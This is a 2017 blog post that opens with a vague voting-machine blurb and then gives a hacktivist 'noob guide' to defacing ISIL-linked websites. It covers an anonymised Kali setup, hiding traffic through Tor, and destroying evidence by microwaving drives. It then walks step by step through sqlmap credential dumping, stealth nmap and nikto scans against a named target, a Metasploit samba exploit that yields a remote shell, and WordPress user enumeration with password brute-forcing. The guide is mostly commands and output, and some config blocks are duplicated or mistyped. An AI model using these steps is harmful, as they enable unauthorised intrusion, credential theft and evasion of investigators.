Friday, April 21, 2017

"B1tSh1fters" Direct Democracy Senator Machines

"B1tSh1fters" Direct Democracy Senator Machines

Counts Votes

Self checking code, at every execution it checks against a
hash taken of each Base Module and the unique Authentication Token,
If either are different from what is stored and encrypted it then restores it from hidden
random On the fly Encryption & up do date P2P, Stenographic nodes. It will keep all logs.

On the fly Cascade Encryption destroys the key on encryption
Base Module and a unique Authentication Token consisting
of a large amount of random data.

The Human Senators present a set of augments.

The Voter is presented with a secure app and a set of augments to vote on. Mandatory. 

FUCK ISIL ONLINE FRIDAY!




  •                                                                                                    
  •                                                                                                    
  •                                                                                                    
  •                                  `.:/+oyh:                                                          
  •                          `:/oyhmNNNMMMMMM-                                                          
  •                         yNNMMMMMMMMMMMMMy                                                          
  •                        .MMMMMMMMMMMMMMMN.                                                          
  •                        /MMMMMMMMMMMMMMMh                                                            
  •                        +MMMMMMMMMMMMMMMo                                                            
  •                        oMMMMMMMMMMMMMMMh                         .:+syhhhhhys/.                    
  •                        sMMMMMMMMMMMMMMMM+.                   `:oyys+/--.....-/o+.                  
  •                        sMMMMMMMMdsooosyhdhyo:`             .+s/-` `..-------..``.`                  
  •                        oMMMMMMMMhyyyyyysso++oso:`          .. `-+ydmNNNNNmmmddho-                  
  •                        oMMMMMMmsssyhdmNMMMMmho//+.         `:ymNMMMmdyo/--....-/o+.                
  •                        +MMMMMM-      .-/ydNMMMNd:         `dMMMmds:.             `-`                
  •                        /MMMMMM+          `-odMMMm         `hhso+.`                                  
  •                        /MMMMMMm`            `/dMN-         `/o-                                    
  •                        -MMMMMMMh`           ` `hMNo`       +s`                  `:.                
  •                        .MMMMMMMMhssssssso+/-/ysoMMMd`      .    `:/oosssssso+--+hm-                
  •                        `MMMMdssyhmNNNNNNNNmh/hMMMMMMs           odmNNNNNNNNdhsoymh-                
  •                         NMM+       `.....`:+:yMMMMMMd              `.....`      `+/`                
  •                         mMd              ..  sMMMMMMN                             .                
  •                         dMs                 `mMMMMMMM                                              
  •                         yM+                `yMMMMMMMN                                              
  •                         oM+               .dMMMMMMMMm                                              
  •                         /M+              `mMMMMMMMMMy                                              
  •                         -My              yMMMMMMMMMM:              ``                              
  •                         `MN.          `/dMMMMMMMMMMm               `oy:`                            
  •                          mMh//+///+oydy+-..:odMMMMMm.      `-:.      `/yyso+//+o+/`                
  •                          oMd` .dMMMMy.        .+dMMMNo-.:+o+++:         ``oNm+mh`                  
  •                          `NMs  -M/dMm/`         `-mMMMNNMMm:           `/dMy./N-                    
  •                           +MMo  hy`sMMmo-      .+dMMMMhdMMMNh/`     `-omMN+ .ms                    
  •                            sMM+ .m+ :hMMNmyoosdNMMMMNo``sMMMMMmhsosymNMNy. .dd`                    
  •                            `sMN+ :N+ `-oyddmmNNNNNms.    :ydmNNNNmmddy+.  .dd.                      
  •                              +NMo :mo    ```.:/+ossoooooo++oo++/-.```    :my`                      
  •                               :mMy`-dy`         `````....`````          +mo`                        
  •                                .hMd-`sd-                              .yh-                          
  •                                 `+NN+`/h/        `/sddhyddhs:`       :h+`                          
  •                                   -hNy..so`        `sMMNMMs`       `+y.                            
  •                                    `+mm: /s.         dMMMm        .s/                              
  •                                      .yNs`.o-       .NMMMN.      -o.                                
  •                                        /md-`/:      yMMMMMh     :/`                                
  •                                         .sm+`-:     mMMMMMN    :-                                  
  •                                           :dy..`    dMMMMMm   ``                                    
  •                                            `+h:     +MMMMMs                                        
  •                                              .o-    `NMMMM-                                        
  •                                                      sMMMy                                          
  •                                                      `NMN.                                          
  •                                                       :m:                                          
  •                                                                                                    
  •                                                                                                    
  • B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
  • https://www.youtube.com/watch?v=V1fMvLbE85E
  • Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
  • ####################################################################################
  • The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
  • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
  • of system crackers, who break into a web server and replace the hosted website with one of their own.
  • 1337 SETUP not for noobs
  • ####################################################################################
  • Mifi access point.
  • https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
  • Prepaid sim cards
  • http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
  • https://www.youtube.com/watch?v=RyzKNMQB3OQ
  • Fake Name generator
  • https://fakena.me/fake-name/
  • DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
  • https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
  • Turn do not broadcast ssid, just type it in at client.
  • SETUP
  • ####################################################################################
  • Set random mac address first, before connecting to wifi.
  • MAC Address Changer for windoze
  • https://technitium.com/tmac/
  • Download the the lastest version of the Kali linux .iso from a free wifi access point & burn on laptop/computer.
  • https://www.kali.org/downloads/
  • Boot from dvd drive;
  • Install onto 16GB usb drive
  • (warning do not use "USB persistence" this is diffrent, just install on to the USB drive using Kali graphic install.)
  • On This drive;
  • CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
  • http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
  • Also use LVM encryption in the Kali graphic install options.
  • The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
  • When the drive is removed it leaves no trace on the computer.
  • Destroy original Kali install disk with by cooking microwave for 3 min,
  • shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
  • Set BIOS too boot from the USB drive and away we go.
  • IN CASE OF EMERGANCY!!
  • Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
  • Lockdown
  • Kali boots with "root" user enabled by default, this is insecure we must change this.
  • Enter into the following into the terminal;
  • sudo adduser an0n
  • Then enter password, leave info blank.
  • Add user to the sudoers list;
  • Enter into the following into the terminal;
  • sudo usermod -a -G sudo an0n
  • Disable root account,
  • Enter into the following into the terminal;
  • sudo passwd -l root
  • reboot and login as An0n complete with password.




  • sudo apt-get install logwatch

  • sudo apt-get install rkhunter chkrootkit

  • In /etc/chkrootkit.conf, change RUN_DAILY to "true" so that it runs regularly, and change "-q" to "" otherwise the output doesn’t make much sense. In /etc/default/rkhunter, change CRON_DAILY_RUN and CRON_DB_UPDATE to "true" so it runs regularly. REPORT_EMAIL="le7ech@gmail.com"

  • Add the following lines to /etc/sysctl.d/10-network-security.conf
  • # Ignore ICMP broadcast requests
    net.ipv4.icmp_echo_ignore_broadcasts = 1
    
    # Disable source packet routing
    net.ipv4.conf.all.accept_source_route = 0
    net.ipv6.conf.all.accept_source_route = 0 
    net.ipv4.conf.default.accept_source_route = 0
    net.ipv6.conf.default.accept_source_route = 0
    
    # Ignore send redirects
    net.ipv4.conf.all.send_redirects = 0
    net.ipv4.conf.default.send_redirects = 0
    
    # Block SYN attacks
    net.ipv4.tcp_max_syn_backlog = 2048
    net.ipv4.tcp_synack_retries = 2
    net.ipv4.tcp_syn_retries = 5
    
    # Log Martians
    net.ipv4.conf.all.log_martians = 1
    net.ipv4.icmp_ignore_bogus_error_responses = 1
    
    # Ignore ICMP redirects
    net.ipv4.conf.all.accept_redirects = 0
    net.ipv6.conf.all.accept_redirects = 0
    net.ipv4.conf.default.accept_redirects = 0 
    net.ipv6.conf.default.accept_redirects = 0
    
    # Ignore Directed pings
    net.ipv4.icmp_echo_ignore_all = 1

  • Chapter 1 Anonymity or "No shit sherlock":
  • ####################################################################################
  • For this chapter Login too a free wifi access point if possible.
  • Install macchanger,
  • Enter into the following into the terminal;
  • sudo apt-get update && sudo apt-get install macchanger






  • sudo apt-get install net-tools
  • ifconfig
  • sudo touch Desktop/MAC.sh && sudo chmod 777 MAC.sh

    sudo nano Desktop/MAC.sh

    !#/bin/bash
    sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
  • Fuck VPN's they lie, can get compromised and/or subpoena
  • tunnel ALL through tor with the following config:
  • Enter into the following into the terminal;
  • sudo apt-get install tor && sudo apt-get install firehol &&
  • sudo nano /etc/default/firehol
  •    
  •     modify the following in the file too START_FIREHOL=YES
  •  sudo apt-get install tor
  • TOR config
  • edit the following to
  • sudo nano /etc/tor/torrc




  • Very Important!!: Must run the following command on each boot without fail;
  • sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
  • Fuck VPN's they lie, can get compromised and/or subpoena
  • tunnel ALL through tor with the following config:
  • Enter into the following into the terminal;
  • sudo apt-get install tor && sudo apt-get install firehol &&
  • sudo nano /etc/default/firehol
  •    
  •     modify the following in the file too START_FIREHOL=YES
  • sudo apt-get install tor
  • TOR config
  • edit the following to
  • sudo nano /etc/tor/torrc
  • to this:
  • ####start below here####
  • VirtualAddrNetworkIPv4 10.192.0.0/10
  • AutomapHostsOnResolve 1
  • TransPort 9040
  • DNSPort 53
  • FascistFirewall 1
  • FirewallPorts 443
  • DataDirectory /var/lib/tor
  • PidFile /var/run/tor/tor.pid
  • User debian-tor
  • ClientOnly
  • strictnodes 1

    ExitNodes  {us}



  • ####end above here#####
  •  Firehol config
  • sudo nano /etc/firehol/firehol.conf
  • to this:
  • ####start below here####
  • version 5
  • server_tor_ports="tcp/9050 tcp/9051"
  • client_tor_ports="default"
  • server_proxy_ports="tcp/9040"
  • lient_tor_ports="default"
  • server_proxy_ports="tcp/9040"
  • client_proxy_ports="default"
  • server_polipo_ports="tcp/8118"
  • client_polipo_ports="default"
  • server_dns_ports="udp/53"
  • client_dns_ports="default"
  • #all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
  • #for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
  • redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
  •  #add to force all incoming tcp traffic to 9040
  •  #for some reason this will redirect locally generated tcp traffic too
  • transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor  dst not "$UNROUTABLE_IPS"
  • interface eth0 dhcp
  •         policy return
  •         client dhcp accept
  •         client all accept
  •  #allow only outgoing TOR traffic
  • interface eth0 internet src not "$UNROUTABLE_IPS"
  •         client all accept user debian-tor
  •        
  •  #add for local DNS and proxy access
  • interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
  •         server dns accept
  •         server privoxy accept
  •         server tor accept
  •         server proxy accept
  •        
  •  #add for local TOR socks and control port access
  • interface lo internal src 127.0.0.1 dst 127.0.0.1
  •         server tor accept
  •         server proxy accept
  • ####end above here#####
  • Remove icewesel and install firefox
  • Enter the following into the terminal;
  • apt-get remove iceweasel &&
  • echo -e “\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main” | tee -a /etc/apt/sources.list > /dev/null &&
  • apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
  • apt-get update &&
  • apt-get install firefox-mozilla-build
  • Firefox plugins to install;
  • https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
  • https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
  • https://addons.mozilla.org/en-US/firefox/addon/ghostery/
  • https://addons.mozilla.org/en-US/firefox/addon/smart-https/
  • https://addons.mozilla.org/en-US/firefox/addon/noscript/
  • https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
  • https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
  • https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  • configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
  • Install proxychains to stay stealth
  • Enter the following into the terminal;
  • sudo apt-get install proxychains
  • Chapter 2 Target Acquired or "How 1337 am I?"
  • ####################################################################################
  • Enter the following into the terminal;
  • sudo proxychains nslookup www.Jihadist.ps
  • ####output start####
  • Server:        8.8.8.8
  • Address:    8.8.8.8#53
  • Non-authoritative answer:
  • www.Jihadist.ps    canonical name = Jihadist.ps.
  • Name:    Jihadist.ps
  • Address: 104.28.##.105
  • Name:    Jihadist.ps
  • Address: 104.28.##.105
  • ####output end####
  • run sqlmap over tor with random user agent at target page for usernames and passwords;
  • Enter the following  into the terminal;
  • sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
  • run nmap in a separate terminal while we wait for the results
  • Scan the ip with nmap + proxychains to route it over tor
  • set to zero ping "-Pn" to avoid detection The
  •  -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
  • Enter the following  into the terminal;
  • sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
  • Scan the site with nikto  + proxychains to route it over tor;
  • Enter the following  into the terminal;
  • sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
  • Scan the site with uniscan + proxychains to route it over tor;
  • Enter the following  into the terminal;
  • sudo proxychains ./uniscan -u https://www.Jihadist.ps/
  • The following info should have been obtained with the help of the tor cloaked scanning
  • Target ip (from nslookup) 104.28.##.105
  • Target OS and Version from nmap.
  • kick it oldschool by googling  "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
  • We need to find out the OS and ports and services running on the target system.
  • EXAMPLE;
  • Once you find the open ports and service like a samba port its party time.
  • Fire up Metasploit!
  • Enter the following  into the terminal;
  • msfconsole
  • Enter the follow into the Metasploit framework console;
  •  msf >set Proxies socks5:127.0.0.1:9050
  • We need to find the version of samba..
  • Enter each into the follow into the Metasploit framework console;
  • msf > use auxiliary/scanner/smb/smb_version
  • msf auxiliary(smb_version) >set RHOST 104.28.##.105
  • RHOST => 104.28.##.105
  • msfauxiliary(smb_version) >set RPORT 445
  • RPORT => 445
  • msfauxiliary(smb_version) >exploit
  • With version in hand, restart msfconsole now we use the appropriate module...
  • msfconsole
  • msf >set Proxies socks5:127.0.0.1:9050
  • msf >use exploit/multi/samba/usermap_script
  • msf exploit(usermap_script) > set RHOST 104.28.##.105
  • msf exploit(usermap_script) >exploit
  • We now have a command shell on the target box!
  • Chapter 3 Other methods of infiltration or "Boba fett is dead!"
  • ####################################################################################
  • If using Wordpress;  (Credit to Dr Chaos);
  • wpscan –-url wordpress_url
  • You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
  • The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
  • If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
  • wpscan –-url wordpress_url –-enumerate u
  • Once user names have been collected, you then can attempt to brute force crack the associated passwords.
  • You can also download our custom word list from here: /usr/share/wordlists
  • WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
  • wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
  • Brute force the following command:
  • wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
  • The result? If you are lucky, you can see WPScan was able to crack the password.
  • To be continued...
  • What does the Fawkes say?